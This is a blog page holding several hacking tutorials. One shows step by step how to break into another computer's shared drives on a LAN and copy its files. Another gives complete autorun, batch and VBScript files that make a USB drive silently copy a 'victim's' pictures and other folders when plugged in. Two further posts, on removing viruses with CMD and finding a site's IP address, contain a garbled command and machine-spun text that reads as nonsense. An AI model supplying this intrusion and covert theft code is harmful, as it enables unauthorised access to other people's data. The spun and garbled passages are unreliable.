This blog is all about Cyber Security and IT

Wednesday, April 25, 2018

Hack Into A Computer Which Is Connect On same network(LAN)




Step 1:- Finding the target


So first off we need to find a computer or the computer to hack into. So if your
plugged in to the LAN, or connected to the WAN, you can begin. Open up Cain and
Abel. This program has a built in sniffer feature. A sniffer looks for all IP addresses in the local sub net. Once you have opened up the program click on the sniffer tab, click the Start/Stop sniffer, and then click the blue cross.



Another window will pop up, make sure “All host in my subnet” is selected, and then

click ok.

It should begin to scan.




Then IP’s, computer names, and mac addresses will show up


Now remember the IP address of the computer you are going to be breaking into.

If you can’t tell whether the IP address is a computer, router, modem, etc, that’s ok.
During the next step we will begin our trial and error.



Step 2:- Trial and error

Now, we don’t know if we have our designated target, or if we have a computer or
printer, or whatever else is on the LAN or WAN.
If you did get the IP of the target though, I still recommend reading through this
section, for it could be helpful later on.
Click on the start menu and go to run, type in cmd, and click ok.
This should bring up the command prompt.
From here we will do most of the hacking.
Now I will be referring to certain commands that need to be inputted into the
command prompt.
I will put these commands in quotes, but do not put the quotes in the code when you
type it into the prompt.
I am only doing this to avoid confusion.
Let’s get back to the hacking.
Type in “ping (IP address of the target).” For example in this tutorial, “ping
192.168.1.103.”
This will tell us if the target is online.
If it worked, it will look something like this (note, I have colored out private
information):



IF it didn’t work, meaning that the target is not online, it will look something like this:



If the target is not online, either switch to a different target, or try another time.
If the target is online, then we can proceed.





Step 4:– Gathering the information

Now, input this command “nbtstat –a (IP address of target).” An example would be
nbtstat –a 192.168.1.103.”
This will show us if there is file sharing enabled, and if there is, it will give us the:
currently logged on user, workgroup, and computer name.



Step 5:- Getting In

Finally it’s time.
By now we know: that our target is online, our target has file sharing, and our target’s
computer name.
So it’s time to break in.
We will now locate the shared drives, folders, files, or printers. Type in “net view 
(IP Address of Target)”
An example for this tutorial would be: “net view 192.168.1.103



We have our just found our share name. In this case, under the share name is “C,”

meaning that the only shared thing on the computer is C. Then to the right, under
Type, it says “Disk.” This means that it is the actual C DISK of the computer. The C
DISK can sometimes be an entire person’s hard drive.



As you can see, for my hack I have already used “K,” so I used “G” instead.

You may also do the same for multiple hacks.
If it worked, it will say “The command completed successfully.
If not, you will have to go retrace you steps.
Now open up “my computer” under the start menu, and your newly created network
drive should be there.



Now, if you disconnect from the WAN or LAN, you will not be able to access this
drive, hence the name Network Drive.
The drive will not be deleted after you disconnect though, but you won’t be able to
access it until you reconnect to the network.
So if you are doing this for the content of the drive, I recommend dragging the files
and folders inside of the drive onto your computer,
because you never know if the target changes the sharing setting.






Congratulations! You’re DONE!

-Commands used in this tutorial:
PING
NBTSTAT -a (IP Address of Target)
NET VIEW (IP Address of Target)
NET USE K: (IP Address of Target)(SHARENAME)
-Program used in this tutorial:
Cain and Abel.

How To Remove Computer Viruses Using CMD


Today Virus can penetrate in our computer through numerous ways like through Internet Browsing, From USB devices and also by installing some infected software.

These viruses make our computer operate slow and also some of the dangerous viruses can steal our data. These viruses can also contaminate our operating system too. So the better choice is to remove these viruses as soon as possible.

There is the unconventional method to remove a virus from a computer system which includes antivirus programs and firewalls etc. But today we are discussing here a method by which you can easily Remove Computer Viruses Using Cmd. The method is simple and straight. Just read out the below post to proceed.

How To Remove Computer Viruses Using CMD

Actually, the command prompt is a utility program that has an access to reconstruct all the system files, and in this method, we will be using the same access of cmd. This method works on attributes removing which can be one reason of virus. As the most probable reason for the virus to come into your computer is through USB device. So this method works perfectly on USB to remove its viruses and secure your computer.

Steps To Remove Computer Viruses Using Command Prompt:

Firs of all click on Start and type cmd. Now right click on a the cmd icon and select run as administrator. Now command prompt window will open, now select your drive which you want to remove a virus.

Let the drive be D. So now type “dir D: attrib -s -h /s /d *.*” Now type  then press enter.

Now the command prompt will explore your selected drive and will load all the files on your drive.

Now if you notice and unusual file.exe and any of autorun.inf then rename it with the command(rename filename.extension new filename)

That’s it now you can access your drives without affecting from viruses.

So above is the-the method for How To Remove Computer Viruses Using CMD Command Prompt. By this method, you can easily remove even malicious viruses that can corrupt your operating system too. This method is very cool and efficient and doesn’t require any software just only a simple utility program of your system and simple cmd tricks. 

How to copy (steal) files from a computer to a Pendrive


Have you ever want anything something from your friend PC,that he is not giving you like games,movies,important files etc. Here I come with cool tricks just plug your USB Flash drive into his PC to automatically copy his files to your pen drive, secretly and silently. Copy the files you brought to his PC to complete the act.

Sneaky, isn’t it? So let us prepare such a smart USB Flash drive.

STEP 1
Open Notepad (I recommend Notepad++) and copy-paste the following lines.

[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat
Save this as autorun.inf

The icon line is optional. You can change the icon to your tastes or leave it to the default icon. It’s useful for social engineering purposes like enticing the user to click a file on the drive by making it looks like a game or something.

The “action=” command is optional too but sometimes when the autorun launches it may ask the user what to open. Depending on what you put here the user will be instructed to click Ok or run the file. This code acts as a backup just in case the user is asked what to open. This is not required if you are operating the computer.

The “shell/open command” also acts as a backup in case the user clicks cancel instead of open when prompted. This code will execute when the drive letter is clicked on.

 

STEP 2
Open Notepad again and copy-paste the following lines

@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics”
%backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites”
%backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”
@echo off
cls
Save this as file.bat

This file is configured to copy the contents of the current users pictures, favorites, and videos folder to the Flash drive under a folder called “all”. This is the section of the code you will need to edit depending on what you want to copy.

The first file path “%USERPROFILE%\pictures” – is the target.
The second file path “%drive%\all\My pics” – is the destination.

STEP 3
Open Notepad once again and copy-paste the following line.

CreateObject(“Wscript.Shell”).Run “””” & WScript.Arguments(0) & “”””, 0, False
Save this as invisible.vbs

This code runs the file.bat as a process so it does not show the CMD prompt and everything the batch file is processing.

STEP 4
Open Notepad one last time and copy-paste the following line.

wscript.exe \invisible.vbs file.bat
Save this as launch.bat

This batch file does two things, it looks for the invisible.vbs file in the root of the Flash drive then loads it with file.bat so file.bat is run with code from vbs file.

STEP 5
Copy all 4 files created in the above steps and put it on the root of the Flash drive, including the icon file if needed. Also create a folder named “all” where the contents are to be copied automatically. You can call this folder by any name, but then you need to reflect the changes you made in step 2.

This is all that needs to be done. Test the Flash drive on your own computer first before playing it out on your victim. It works flawlessly.

How to Find Server’s IP Address of Any Website


Today we will share an intriguing trap to discover server IP address of Any site with the assistance of Reverse Ip Lookup. You don't have to introduce any product to rehearse this trap.

IP Lookup is a method or equation to discover the server's IP Address of any site. As a matter of fact, in this, we analyze for the IP Address of the facilitating server of any server. With this, we can watch the Ip Address of each site like Facebook, Twitter, and endless more prominent locales. You can have its IP address and different more pith through this query IP strategy. There are various techniques to Trace back the IP address of any site.

There are numerous strategies for Reverse IP Lookup. Best 4 strategies out of them are recorded beneath.

In this strategy basically ping charges work for us to find IP address of any site. As a matter of fact, ping summon works ICMP convention which is made for servers address. Thus this order uses to find the server address.

Tap on begin and type CMD and afterward press Enter.

Presently summon incite will gets open.

Sort ping Site name (for ex-cyberknowledgebase.com).

What's more, press Enter.

Presently this will demonstrate to you the IP address of the site and all outing subtle elements of the site area.

#2 Using Terminal In MAC Or Linux:-

The terminal resembles the summon provoke yet it is in the OS MAC and in Linux. In this, we can type summons as we did, in CMD. Presently in this terminal, you will query for Ip address of any site utilizing a straightforward summon.

Open terminal with a squeezing CTRL+ALT+T alright console without a moment's delay.

Presently type ping - c1 Sitename (for ex:- ping - c1 cyberknowledgebase.com).

Presently same as in above technique this will show IP address of the server of cyberknowledgebase

#3 Using Network Utility In MAC:-

Discover Server's IP Address of Any Website

Open Network Utility on your MAC.

There you will discover a ping tab tap on it.

Presently enter the address of the site which you need to Reverse Lookup for IP in the content field box.

Tap on ping catch.

This will ping the site consequently and you will get the IP address of the site server.

#4 Using The WHOIS System

All things considered, you can likewise utilize WHOIS information to discover the IP Address of any site. Typically, clients utilize WHOIS to discover IP address of their coveted sites. You can visit any open site like whois.net or networksolutions.com to locate the entire insights about the site.

You simply need to visit destinations which offers WHOIS data to people in general and after that look for your coveted site. You will get comes about like the accompanying:

Current Registrar: REGISTER.COM, INC.

IP Address: 207.241.148.80 (ARIN and RIPE IP seek) . . .

#5 Method: Using Online Sites For Reverse IP Lookup:-

There are numerous online sites which render you the IP address of the server of any webpage without utilizing any product or any summon. You simply need to glue or sort the URL of the site which you need to search for the IP address. What's more, the site will give you the full subtle elements of the site.

Open the destinations li

 

ke www.site24x7.com and glue the URL of a site which you need to query for a server address.

Tap on Test Now Button.

By this, the site will show you the full detail of that site.

Comparative Sites:

iPinfo

This is a standout amongst the most adaptable instruments to discover the proprietor and web supplier of any site, area or IP address. Finding IP addresses is utilized for finding the root of undesirable messages or the wellspring of infection and port assaults. Other than the space WHOIS, you can likewise discover the enlisted data about IP address ranges, which can be utilized to in any event distinguish the web get to supplier for dial-up clients with dynamic IP addresses.

Get Site IP

 

Discover Server's IP Address of Any Website

It is a standout amongst the most valuable devices in the event that you are hoping to discover up the IP address of any site. It doesn't give numerous highlights contrasted with other. It essentially records the IP Address and nation it is exceptionally easy to understand clients simply need to enter the site name in the pursuit box.

Whatismyipaddress

This is a basic tool kit which furnishes you with the IP Address of any hostname. It gives you the IPv4 address and in addition IPv6 address. It is much-userfriendly, clients simply need to scan for their site name and essentially tap on "Query IP Address" to discover the IP address of any site.

 

HCI information can be utilized to discover the IP of a host machine (change over host to IP) or space name (change over the area name to IP address) or discover the name of one of the hosts at an IP address (change over IP address). Clients simply need to enter the site name in "Host Name" keeping in mind the end goal to discover the IP address.

As a matter of fact, these strategies are utilized when there is a need to Retrace any site which incorporates a few exercises which we need to think about. Likewise, at some point this Reverse Ip address Lookup strategy is utilized to track the programmers and furthermore to identify a portion of the phishing locales which may include in some illicit exercises on the web.